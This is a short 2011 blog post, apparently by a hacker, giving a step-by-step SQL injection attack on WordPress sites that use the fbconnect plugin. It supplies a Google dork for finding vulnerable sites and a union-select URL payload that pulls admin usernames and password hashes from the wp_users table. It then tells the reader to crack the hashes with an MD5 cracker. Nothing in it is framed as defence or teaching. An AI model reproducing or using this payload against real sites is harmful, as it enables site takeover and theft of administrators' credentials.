Monday, November 14, 2011

WordPress Blog Exploit

First of all use Google Dork to find out such Sites


Dork: inurl:"fbconnect_action=myhome"

[Image: untitled24.JPG]

You will be get such info of admin on page

[Image: untitled22.JPG]

Just change this part of URL :
?fbconnect_action=myhome&userid=

With This part of URL :
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z​0mbyak,7,8,9,10,11,12+from+wp_users--

[Image: untitled23.JPG]

Now You will be get Username and Password of Admin

Than Just Encrypt Password In any MD5 Cracker





Posted by h at 7:47 AM

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)